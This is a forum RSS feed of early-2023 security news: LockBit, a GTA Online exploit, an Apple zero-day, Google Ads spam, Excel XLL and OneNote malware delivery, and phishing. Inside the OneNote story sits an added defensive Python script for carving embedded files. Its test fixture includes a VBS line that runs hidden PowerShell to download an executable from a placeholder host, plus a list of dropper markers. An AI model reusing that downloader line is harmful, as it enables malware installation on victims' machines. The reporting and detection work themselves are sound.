	Despite LockBit’s relative professionalism, the group has, at times, slipped into showboating and bizarre behavior. During desperate efforts to get attention—and attract affiliates—in its early months, the criminal group held an essay-writing competition and paid prizes to the winners. And in September 2022, the group memorably posted a message on a cybercrime forum claiming it would pay anyone $1,000 if they got the LockBit logo tattooed on themselves. Around 20 people shared photos and videos with their feet, wrists, arms, and chests all branded with the cybercrime gang’s logo.
</p>

<p>
	 
</p>

<p>
	LockBit’s meteoric rise and recent attacks against high-profile targets could ultimately be its downfall, though. Notorious ransomware groups have been infiltrated, exposed, and disrupted in recent years. Before Russia’s full-scale invasion of Ukraine in February 2022, the Russian Federal Security Service (FSB) arrested high-profile REvil hackers, although the group has since returned. Meanwhile, the US military hacking unit Cyber Command has admitted to disrupting some ransomware groups. And a Ukrainian cybersecurity researcher contributed to the downfall of the Conti ransomware brand last year after infiltrating the group and publishing more than 60,000 of the group’s internal chat messages.
</p>

<p>
	 
</p>

<p>
	These deterrent actions appear to be having some impact on the overall ransomware ecosystem. While it is difficult to determine real totals of how much money ransomware actors take in, researchers who track cybercriminal groups and those who specialize in cryptocurrency tracing have noticed that ransomware gangs seem to be taking in less money as government enforcement actions impede their operations and more victims refuse to pay.
</p>


<p>
	 
</p>

<p>
	The screws are already turning on LockBit. An apparently disgruntled LockBit developer leaked its 3.0 code in September, and Japanese law enforcement has claimed it can decrypt the ransomware. US law enforcement is closely watching the group as well, and its recent attacks can only have raised its profile. In November 2022, the FBI revealed that an alleged LockBit affiliate, Mikhail Vasiliev, 33, had been arrested in Canada and would be extradited to the US. At the time, deputy attorney general Lisa O. Monaco said officials had been investigating LockBit for more than two and a half years.
</p>

<p>
	 
</p>

<p>
	“I think LockBit is going to have a rough year this year and potentially see their numbers go down,” Analyst1’s DiMaggio says. “They are under a lot of scrutiny now, and they also may have lost their main developer, so they could have development issues that bite them in the ass. It’ll be interesting to see. These guys don’t care about anyone or anything.”
</p>

<p>
	 
</p>

<p>
	LockBit has seemingly been so dangerous and prolific because it maintained standards for the types of targets its affiliates could hit and avoided attracting too much attention while casting a wide net. But times have changed, and shutting down the UK’s international mail exports for more than a week isn’t exactly keeping a low profile.
</p>

<p>
	 
</p>

<p>
	“They do have a bit of a PR problem when it comes to their affiliates at this point, because they obviously can't seem to handle them very well,” Malwarebytes’ Segura says. “The bragging, hitting some pretty critical infrastructure, and high-visibility targets is a very dangerous game they're playing. LockBit has a big target on its back right now.”
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.wired.com/story/lockbit-ransomware-attacks/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">12115</guid><pubDate>Tue, 24 Jan 2023 18:40:03 +0000</pubDate></item><item><title>GTA Online bug exploited to ban, corrupt players&#x2019; accounts</title><link>https://nsaneforums.com/news/security-privacy-news/gta-online-bug-exploited-to-ban-corrupt-players%E2%80%99-accounts-r12096/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Grand Theft Auto (GTA) Online players report losing game progress, in-game money being stolen, and being banned from game servers due to an alleged vulnerability in the game's PC version.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">GTA Online is the multiplayer spin of the popular action-adventure game series by Rockstar Games, initially released in October 2013, with new content being added to it through free title updates.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Reportedly, a new "remote code execution" vulnerability in the PC game client was abused by the developer of the 'North' Grand Theft Auto V cheat to remotely change players' account attributes (such as zeroing their money balance), corrupt accounts, and even ban players from the game.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to the user reports, the exploit can impact even players not in the same multiplayer lobby as the attackers, so anyone, as long as they're online, is susceptible to attacks.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to a changelog seen by BleepingComputer, the North GTA Online cheat developer added these new "features" on January 20th, 2023, as part of its 2.0.0 release.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="north-changelog.jpg" class="ipsImage" data-ratio="55.14" height="281" width="720" src="https://www.bleepstatic.com/images/news/security/g/gta-online/north-changelog.jpg" />
		
			<p>
				<span style="font-size:14px;">GTA Online Cheat command list<br />
				Source: BleepingComputer</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">This alleged vulnerability has received a CVE and is being tracked under <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24059" rel="external nofollow">CVE-2023-24059</a>. </span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The developer of the North GTA Online cheat removed these abusive features on January 21st, apologizing for the mayhem it has caused.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Removed badsport/corrupt account for players (bad judgement on my part for adding this public)," reads a changelog for the North cheat.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Removed take money from player (bad judgement on my part for adding this public)."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Unfortunately, the reversal comes too late, as the issue has already affected many gamers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The Rockstar Games' support forums have been <a href="https://support.rockstargames.com/community/200063373" rel="external nofollow">flooded</a> by user reports claiming to have experienced account problems since the cheat's release.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="support.png" class="ipsImage" data-ratio="75.10" height="540" width="369" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Games/1/support.png" />
		
			<p>
				<span style="font-size:14px;">Rockstar Games support forums on Monday morning<br />
				(BleepingComputer)</span>
			</p>
		
	
</div>

<h2>
	<span style="font-size:14px;">Not safe to play on a PC</span>
</h2>

<p>
	<span style="font-size:14px;">While Rockstar Games has not issued an official announcement on the situation yet, developers and those in this space claim that the exploit is a "partial remote code execution" flaw and could extend to breaching not only GTA Online accounts but also the security of the computer running the game.</span>
</p>

<p>
	 
</p>

<div>
	<div class="ipsEmbeddedOther">
		<iframe allowfullscreen="" data-controller="core.front.core.autosizeiframe" data-embedid="embed6079552114" src="https://nsaneforums.com/index.php?app=core&amp;module=system&amp;controller=embed&amp;url=https://twitter.com/Fluuffball/status/1616600849572052992?ref_src=twsrc%255Etfw%257Ctwcamp%255Etweetembed%257Ctwterm%255E1616600849572052992%257Ctwgr%255E292d7a0f5a05dac1fc5708ac0bb4526cc71eaa39%257Ctwcon%255Es1_%26ref_url=https://www.bleepingcomputer.com/news/security/gta-online-bug-exploited-to-ban-corrupt-players-accounts/" style="height:702px;"></iframe>
	</div>
</div>

<p>
	<span style="font-size:14px;">A Twitter user, Tez2, who closely follows Rockstar Games, <a href="https://twitter.com/TezFunz2/status/1616535689503600640" rel="external nofollow">stated</a> that users should avoid playing the game without a firewall rule, or better, not play it at all.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">A temporary fix for corrupted accounts that seems to have worked for some players is to delete the "Rockstar Games" folder from the Windows Documents folder and then reload the game to refresh profile data. </span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">BleepingComputer has not tested this method, so proceed at your own risk.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Speyedr, the developer of a custom GTA V firewall tool named 'Guardian,' has warned that attackers are on the verge of finding a complete remote code execution pathway for the newly emerged exploits.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">However, Speyedr warned that Guardian needs to be configured correctly to protect users against the exploit and advises that Windows users not play the game until the bug is fixed.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Just to reassure everyone--Guardian still works, and this new exploit doesn't somehow bypass Guardian," <a href="http://twitter.com/Speyedr_AU/status/1616686368243224576" rel="external nofollow">tweeted Speyedr</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">HOWEVER, the chance of any user (especially beginners) setting up Guardian incorrectly in a way that doesn't protect them is too high for such a dangerous exploit."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">BleepingComputer has contacted Rockstar Games to comment on these issues, but we are still waiting to hear back from the game publisher.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Until there's an official fix for the issues by Rockstar Games, it would be advisable to avoid launching the game on PC, especially if you have logged significant progress or have spent a lot of money on it.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/gta-online-bug-exploited-to-ban-corrupt-players-accounts/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12096</guid><pubDate>Mon, 23 Jan 2023 19:51:17 +0000</pubDate></item><item><title>Apple fixes actively exploited iOS zero-day on older iPhones, iPads</title><link>https://nsaneforums.com/news/security-privacy-news/apple-fixes-actively-exploited-ios-zero-day-on-older-iphones-ipads-r12095/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Apple has backported security patches addressing a remotely exploitable zero-day vulnerability to older iPhones and iPads.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This bug is tracked as <a href="https://support.apple.com/en-us/HT213531#:~:text=Google%20V8%20Security-,WebKit,-Available%20for%3A%20iPhone" rel="external nofollow">CVE-2022-42856</a>, and it stems from a type confusion weakness in Apple's WebKit browser engine.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Apple said that the flaw discovered by Clément Lecigne of Google's Threat Analysis Group allows maliciously crafted webpages to perform arbitrary code execution (and likely gain access to sensitive information) on vulnerable devices.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Attackers can successfully exploit this flaw by tricking their targets into visiting a maliciously crafted website under their control.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Once achieved, arbitrary code execution could allow them to execute commands on the underlying operating system, deploy additional malware or spyware payloads, or trigger other malicious activity.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In a <a href="https://support.apple.com/en-us/HT213597" rel="external nofollow">security advisory</a> published today, Apple once again said that they're aware of reports that this security flaw "may have been actively exploited."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The company addressed the zero-day bug with improved state handling for the following devices: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).</span>
</p>

<h2>
	<span style="font-size:14px;">Secure older devices to block attacks</span>
</h2>

<p>
	<span style="font-size:14px;">Although Apple disclosed that it received reports of active exploitation, the company is yet to publish info regarding these attacks.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">By withholding this info, Apple is likely aiming to allow as many users as possible to patch their devices before other attackers pick up on the zero-day's details and start deploying custom exploits targeting vulnerable iPhones and iPads.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Even though this security flaw was most likely only used in targeted attacks, it's still strongly recommended to install today's security updates as soon as possible to block potential attack attempts.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">CISA added the zero-day to its list of known exploited vulnerabilities <a href="https://www.cisa.gov/uscert/ncas/current-activity/2022/12/14/cisa-adds-one-known-exploited-vulnerability-catalog" rel="external nofollow">on December 14</a>, requiring Federal Civilian Executive Branch (FCEB) agencies to patch it to secure them "against active threats."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Today, Apple also patched <a href="https://support.apple.com/en-gb/HT201222" rel="external nofollow">dozens of other security flaws</a> in its Safari web browser and its latest macOS, iOS, and watchOS versions.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/apple/apple-fixes-actively-exploited-ios-zero-day-on-older-iphones-ipads/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12095</guid><pubDate>Mon, 23 Jan 2023 19:48:26 +0000</pubDate></item><item><title>Google Ads invites being abused to push spam, adult sites</title><link>https://nsaneforums.com/news/security-privacy-news/google-ads-invites-being-abused-to-push-spam-adult-sites-r12094/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Google Ads invites are being abused to deliver email messages promoting spam and sex websites to users who are otherwise not necessarily using Google advertising platforms.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The Google Ads platform allows advertisers to create advertising campaigns on publisher partners' websites and in Google search results.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The recently seen widespread campaign involves threat actors using the Google Ads admin interface to send bulk email invitations that, coming from Google, bypass recipient spam filters.</span>
</p>

<h2>
	<span style="font-size:14px;">Careful with that invite!</span>
</h2>

<p>
	<span style="font-size:14px;">Users around the world are reporting receiving emails from authentic Google Ads accounts that are catching their attention.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">These bogus invite emails, sent from Google's servers, entice users to visit spam links contained in the email message.</span>
</p>

<div>
	
		
			<span style="font-size:14px;">Google Ads admin invite abused for spamming (erohtar via Reddit)</span>
		
	
</div>

<p>
	<span style="font-size:14px;">"The mail is sent from official Google address 'Google Ads ads-account-noreply@google.com'" <a href="https://www.reddit.com/r/india/comments/10hhi8v/can_someone_tell_me_wtf_this_new_scam_is/" rel="external nofollow">writes</a> Redditor erohtar.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"Few weeks back my boss gave me access to the company's Google Ads account, so I'm familiar with this email. It's legit, actually sent by Google, and it WILL give me access to the scammer's Google Ads account."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Many others have reported receiving identical emails, leaving them frustrated:</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"I've been trashing the emails but it would be nice if Google would get a handle on their products so their users aren't having to constantly guard against phishing scams," <a href="https://support.google.com/mail/thread/197641706?hl=en&amp;msgid=197820066" rel="external nofollow">commented</a> Brandon on a Google community forum thread started by another affected person.</span>
</p>

<div>
	
		
			<span style="font-size:14px;">Google Ads spam email (<a href="https://www.reddit.com/r/letsplay/comments/10dbt0d/multiple_accept_your_invitation_to_access_a/?utm_source=share&amp;utm_medium=ios_app&amp;utm_name=iossmf" rel="external nofollow">meFalloutnerd93</a> via Reddit)</span>
		
	
</div>

<h2>
	<span style="font-size:14px;">Websites promote adult content</span>
</h2>

<p>
	<span style="font-size:14px;">Google Ads account administrators can use the "<a href="https://developers.google.com/google-ads/api/docs/account-management/managing-invitations" rel="external nofollow">invitations</a>" feature to add new users to the account admin interface via email invites.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">But, it looks like clever threat actors have yet again found a way to misuse the feature for their nefarious activities.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The URLs contained in these invite emails ultimately redirected users to dodgy websites pushing adult dating sites, many of which appear to be designed to collect personal information from visitors.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">It might be tempting to report these emails as spam or phishing but that isn't the solution. Doing so may also block legitimate emails being sent from Google.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">To better understand the issue and how Google plans on remedying it, BleepingComputer emailed Google well in advance of publishing. A spokesperson acknowledged our request and we are awaiting further response.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In the meantime, users should be on the lookout and refrain from clicking links or attachments within emails even if these emails appear to or in fact originate from authentic Google servers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/google-ads-invites-being-abused-to-push-spam-adult-sites/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">12094</guid><pubDate>Mon, 23 Jan 2023 19:47:02 +0000</pubDate></item><item><title>Microsoft plans to kill malware delivery via Excel XLL add-ins</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-plans-to-kill-malware-delivery-via-excel-xll-add-ins-r12087/</link><description><![CDATA[<p>
	Microsoft is working on adding XLL add-in protection for Microsoft 365 customers by including automated blocking of all such files downloaded from the Internet.
</p>

<p>
	 
</p>

<p>
	This will help tackle the rise of malware campaigns abusing this infection vector to an ever-growing extent during the last several years.
</p>

<p>
	 
</p>

<p>
	"In order to combat the increasing number of malware attacks in recent months, we are implementing measures that will block XLL add-ins coming from the internet," Redmond <a href="https://www.microsoft.com/en-us/microsoft-365/roadmap?filters=&amp;searchterms=115485" rel="external nofollow" target="_blank">says</a>.
</p>

<p>
	 
</p>

<p>
	Microsoft says the new feature will reach general availability in multi-tenants worldwide in March for desktop users in the Current, Monthly Enterprise, and Semi-Annual Enterprise channels.
</p>

<p>
	 
</p>

<p>
	<a href="http://learn.microsoft.com/en-us/office/dev/add-ins/excel/make-custom-functions-compatible-with-xll-udf" rel="external nofollow" target="_blank">Excel XLL</a> files are dynamic-link libraries (DLLs) used to extend the functionality of Microsoft Excel by providing additional features, such as custom functions, dialog boxes, and toolbars.
</p>

<p>
	 
</p>

<p>
	Attackers are using XLL add-ins in phishing campaigns to push various malicious payloads in the form of download links or attachments <a href="https://www.bleepingcomputer.com/news/security/malicious-excel-xll-add-ins-push-redline-password-stealing-malware/" target="_blank" rel="external nofollow">camouflaged</a> as documents from trusted entities such as business partners or as fake advertising requests, holiday gift guides, and website promotions.
</p>

<p>
	 
</p>

<p>
	Once the target double-clicks an unsigned XLL file to open it, they will be warned of "a potential security concern," that "add-ins might contain viruses or other security hazards," and prompted to enable the add-in for the current session.
</p>

<p>
	 
</p>

<p>
	If the add-in is activated (and many people ignore Office alerts without giving them a second glance), it will also deploy a malware payload on the victim's device in the background.
</p>

<p>
	 
</p>

<p>
	As XLL files are executables and attackers can use them to run malicious code on your computer, you must only open one if you're 100% sure it comes from a trusted source.
</p>

<p>
	 
</p>

<p>
	Additionally, such files are not generally sent as email attachments but instead installed by a Windows admin. Therefore, if you receive an email or any other message pushing such files, delete the message and report it as spam.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="XLL%20warning.png" class="ipsImage" data-ratio="55.30" height="318" width="575" src="https://www.bleepstatic.com/images/news/u/1109292/XLL%20warning.png">
	</p>

	<div>
		<em>Excel XLL warning (BleepingComputer)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	As Cisco Talos said in a January report, XLLs are now used by both financially-motivated attackers and state-backed threat groups (<a href="http://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/" rel="external nofollow" target="_blank">APT10</a><a href="https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files" rel="external nofollow" target="_blank">,</a> <a href="https://www.bleepingcomputer.com/news/security/malicious-microsoft-excel-add-ins-used-to-deliver-rat-malware/" target="_blank" rel="external nofollow">FIN7</a>, <a href="https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed" rel="external nofollow" target="_blank">Donot</a>, <a href="https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/" rel="external nofollow" target="_blank">TA410</a>) as an infection vector to deliver first-stage payloads onto their targets' devices.
</p>

<p>
	 
</p>

<p>
	"Even if XLL add-ins existed for some time, we were not able to detect their usage by malicious actors until mid-2017 when some APT groups started using them to implement a fully functional backdoor," Cisco Talos said.
</p>

<p>
	 
</p>

<p>
	"We also identified that their usage significantly increased over the last two years as more commodity malware families adopted XLLs as their infection vector."
</p>

<p>
	 
</p>

<p>
	One year ago, HP's threat analyst team <a href="https://threatresearch.ext.hp.com/hp-wolf-security-threat-insights-report-q4-2021/" rel="external nofollow" target="_blank">reported</a> seeing a "near-sixfold surge in attackers using Excel add-ins (.XLL)" as part of its Threat Insights Report Q4 2021.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="XLL%20attack%20timeline.png" class="ipsImage" data-ratio="75.10" height="522" width="720" src="https://www.bleepstatic.com/images/news/u/1109292/XLL%20attack%20timeline.png">
	</p>

	<div>
		<em>XLL attack timeline (Cisco Talos)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	This is part of a broader effort to block threat actors from using malicious Office documents to deliver and install malware on their targets' computers.
</p>

<p>
	 
</p>

<p>
	Since July 2022, Microsoft has <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-starts-blocking-office-macros-by-default-once-again/" target="_blank" rel="external nofollow">blocked VBA macros by default</a> in Office documents downloaded from the Internet (those carrying a Mark of the Web), making them harder to enable in Access, Excel, PowerPoint, Visio, and Word.
</p>

<p>
	 
</p>

<p>
	In March 2021, the company <a href="https://www.bleepingcomputer.com/news/security/microsoft-office-365-gets-protection-against-malicious-xlm-macros/" target="_blank" rel="external nofollow">added XLM macro protection</a> in M365 by expanding the runtime defense provided by Office 365's integration with Antimalware Scan Interface (AMSI) to include Excel 4.0 (XLM) macro scanning.
</p>

<p>
	 
</p>

<p>
	Redmond started disabling Excel 4.0 (XLM) macros by default when opened in Microsoft 365 tenants in January 2021.
</p>

<p>
	 
</p>

<p>
	Years before, <a href="https://www.bleepingcomputer.com/news/security/microsoft-office-365-customers-get-protection-against-malicious-macros/" target="_blank" rel="external nofollow">in 2018</a>, Microsoft also extended support for AMSI to Office 365 apps to defend customers against attacks using VBA macros.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-plans-to-kill-malware-delivery-via-excel-xll-add-ins/" rel="external nofollow">Microsoft plans to kill malware delivery via Excel XLL add-ins</a>
</p>
]]></description><guid isPermaLink="false">12087</guid><pubDate>Mon, 23 Jan 2023 18:05:49 +0000</pubDate></item><item><title>Cybercriminals are now exploiting OneNote to spread malware</title><link>https://nsaneforums.com/news/security-privacy-news/cybercriminals-are-now-exploiting-onenote-to-spread-malware-r12078/</link><description><![CDATA[<p>
	For the longest time, cybercriminals have exploited the macro feature in Office applications such as Word and Excel to infect unsuspecting users' PCs with malware. They typically inject malicious macro code into an otherwise legitimate-looking Word or Excel document, then convince users to enable macros, supposedly so the file displays properly. Enabling them simply lets the malware run on the victim's PC.
</p>

<p>
	 
</p>

<p>
	Microsoft is aware of this behavior by threat actors, so they <a href="https://www.neowin.net/news/microsoft-to-block-vba-macros-to-protect-unsuspecting-users-from-sneaky-malware/" rel="external nofollow">eventually blocked macros in Office documents by default</a>. However, cybercriminals are now using another app to trick users into infecting their own PCs with malware: digital note-taking app OneNote.
</p>

<p>
	 
</p>

<p>
	<img alt="1674445415_ezgif.com-gif-maker_(4)_story" class="ipsImage" data-ratio="71.81" height="489" width="720" src="https://cdn.neowin.com/news/images/uploaded/2023/01/1674445415_ezgif.com-gif-maker_(4)_story.jpg">
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/" rel="external nofollow">As reported by BleepingComputer</a>, cybercriminals have been found sending phishing emails that purportedly contain DHL invoices, remittance forms, shipping notifications and documents, and mechanical drawings. Instead of using macros, which OneNote does not support, cybercriminals are exploiting OneNote's ability to attach files within a notebook.
</p>

<p>
	 
</p>

<p>
	They do this by embedding malicious VBS files in a OneNote notebook. When double-clicked, these scripts download and install malware from a remote site. To conceal them and make the notebook look as legitimate as possible, the threat actors overlay a "Double click to view file" box on top of the embedded files.
</p>

<p>
	 
</p>

<p>
	<img alt="1674445576_ezgif.com-gif-maker_(5)_story" class="ipsImage" data-ratio="59.72" height="408" width="720" src="https://cdn.neowin.com/news/images/uploaded/2023/01/1674445576_ezgif.com-gif-maker_(5)_story.jpg">
</p>

<p>
	<em>Behind that "Double Click to View File" button are the malicious files.</em>
</p>

<p>
	 
</p>

<p>
	This means that double-clicking the box actually launches the hidden file, which installs malware onto the device. OneNote does warn that opening attachments could harm the computer and its data, but many users will simply ignore the warning and click "OK" anyway.
</p>
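<p>
	The carving step a defender would automate for the attachments described above, as an added example that is not part of the original article or of BleepingComputer's research: it walks a OneNote section for the FileDataStoreObject structure documented in MS-ONESTORE, extracts each embedded file, and applies a few assumed script-dropper markers. The sample section and the VBS text are constructed for the example and are not samples from the campaign.
</p>

```python
"""Carve embedded files out of a OneNote (.one) section and triage them.

Added example: not code from the article or from BleepingComputer. It uses the
FileDataStoreObject layout from [MS-ONESTORE] 2.6.13: a 16-byte header GUID
{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}, an 8-byte little-endian length, 4 unused
bytes, 8 reserved bytes, the file data, then a 16-byte footer GUID
{71FBA722-0F79-4A0B-BB13-899256426B24}. The sample section below is built in
memory and is not a real notebook; the script markers are assumptions.
"""
from __future__ import annotations

import struct
import uuid

HEADER_GUID = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
FOOTER_GUID = uuid.UUID("{71FBA722-0F79-4A0B-BB13-899256426B24}").bytes_le
PREAMBLE_LEN = 16 + 8 + 4 + 8  # guidHeader + cbLength + unused + reserved

# Heuristic markers for VBS/WSH-style droppers (assumption for the example).
SCRIPT_MARKERS = (b"WScript.Shell", b"CreateObject(", b"powershell",
                  b"cmd /c", b"MSXML2.XMLHTTP", b"ADODB.Stream")


def carve_embedded_files(section: bytes) -> list[tuple[int, bytes]]:
    """Return (offset, file_bytes) for every FileDataStoreObject in a section."""
    found = []
    pos = section.find(HEADER_GUID)
    while pos != -1:
        if pos + PREAMBLE_LEN > len(section):
            break
        (length,) = struct.unpack_from("<Q", section, pos + 16)
        start = pos + PREAMBLE_LEN
        end = start + length
        # Trust the length only if the footer GUID sits exactly where it points.
        if end + 16 <= len(section) and section[end:end + 16] == FOOTER_GUID:
            found.append((start, section[start:end]))
            pos = section.find(HEADER_GUID, end + 16)
        else:
            pos = section.find(HEADER_GUID, pos + 1)
    return found


def classify_payload(data: bytes) -> str:
    """Rough triage by magic bytes, falling back to script-text markers."""
    if data.startswith(b"MZ"):
        return "pe-executable"
    if data.startswith(b"PK\x03\x04"):
        return "zip-or-ooxml"
    if data.startswith(b"\x89PNG"):
        return "png-image"
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"\xd0\xcf\x11\xe0"):
        return "ole-compound"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return "script-dropper"
    return "unknown"


def triage_section(section: bytes) -> list[dict]:
    """Carve and classify every embedded file; one record per file."""
    return [{"offset": off, "size": len(blob), "kind": classify_payload(blob)}
            for off, blob in carve_embedded_files(section)]


def build_sample_section(files: list[bytes]) -> bytes:
    """Constructed fixture: filler bytes plus one FileDataStoreObject per file."""
    out = bytearray(b"\x00" * 64)  # stand-in for the real section header
    for blob in files:
        out += HEADER_GUID + struct.pack("<Q", len(blob)) + b"\x00" * 12
        out += blob + FOOTER_GUID + b"\x00" * 16
    return bytes(out)


# Constructed sample: a benign PNG stub next to a VBS-style downloader.
SAMPLE_VBS = (b'Set sh = CreateObject("WScript.Shell")\r\n'
              b'sh.Run "powershell -w hidden -c iwr http://example.invalid/x.exe", 0, False\r\n')
SAMPLE_SECTION = build_sample_section([b"\x89PNG\r\n\x1a\n" + b"\x00" * 32, SAMPLE_VBS])

if __name__ == "__main__":
    for record in triage_section(SAMPLE_SECTION):
        print(record)
```

<p>
	Run it against a quarantined .one attachment by passing <code>Path(...).read_bytes()</code> to <code>triage_section</code>; anything carved that is not an image or document is worth a closer look, regardless of what the note's "Double click to view file" overlay says.
</p>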

<p>
	 
</p>

<p>
	In the emails seen by BleepingComputer, the malicious OneNote documents typically install remote access trojans that can steal sensitive information and cryptocurrency wallets. Others can even take screenshots and record video using the victim's webcam.
</p>

<p>
	 
</p>

<p>
	To protect yourself from these attacks, do not open attachments in unsolicited emails from people you do not know. Also, make sure your antivirus software is up to date so it can detect and remove the malware. Organisations with no business need to receive notebooks by email can go further and block or quarantine .one attachments at the mail gateway.
</p>

<p>
	 
</p>

<p>
	Source and images: <a href="https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/" rel="external nofollow">BleepingComputer</a>
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/cybercriminals-are-now-exploiting-onenote-to-spread-malware/" rel="external nofollow">Cybercriminals are now exploiting OneNote to spread malware</a>
</p>
]]></description><guid isPermaLink="false">12078</guid><pubDate>Mon, 23 Jan 2023 09:03:19 +0000</pubDate></item><item><title>Like it or not, email is still our greatest tool - and the source of some of our biggest threats</title><link>https://nsaneforums.com/news/security-privacy-news/like-it-or-not-email-is-still-our-greatest-tool-and-the-source-of-some-of-our-biggest-threats-r12075/</link><description><![CDATA[<p>
	<span style="font-size:22px;"><strong>We're told to look for telltale signs of phishing attacks - but that's hard when they look just like real emails. </strong></span>
</p>

<p>
	 
</p>

<p>
	From the most basic 'you've won a prize' scams to the most advanced espionage campaigns, attacks targeting our inboxes succeed again and again.
</p>

<p>
	 
</p>

<p>
	There's a reason cyber criminals and hackers continue to send millions of phishing emails.
</p>

<p>
	 
</p>

<p>
	Because, no matter whether you're working from the office or working remotely from home, email still plays a vital part in our working day. Sure, there's now a place for Slack, or Zoom, or Microsoft Teams, or whatever overlay of productivity software you are expected to use.
</p>

<p>
	 
</p>

<p>
	But for most people, getting stuff done still comes down to email.
</p>

<p>
	 
</p>

<p>
	The strengths of email: anyone can email you, and add all sorts of attachments. The weaknesses of email: anyone can email you and add all sorts of attachments. That makes it one of the most powerful productivity tools around - and a big source of risk.
</p>

<p>
	 
</p>

<p>
	Most of us are still dealing with email overload (now we also have overload via all those other communications tools, too). That means you are still potentially looking at - and trying to respond to - hundreds of messages from colleagues, clients or anyone else you do business with, every day.
</p>

<p>
	 
</p>

<p>
	But how long do you spend looking at those emails, and are they really from who they claim to be?
</p>

<p>
	 
</p>

<p>
	Cyber criminals know that our time is tight and we're not going to have a chance to carefully analyse every message which reaches our inbox –  one of the reasons why phishing is still so successful.
</p>

<p>
	 
</p>

<p>
	And they're using it for all manner of malicious campaigns: tricking us into clicking fake but convincing links that ask for our username and password, convincing us to make urgent financial transfers, or duping us into downloading malware or ransomware from malicious attachments. Phishing continues to be an effective weapon in the hackers' cyber arsenal.
</p>

<p>
	 
</p>

<p>
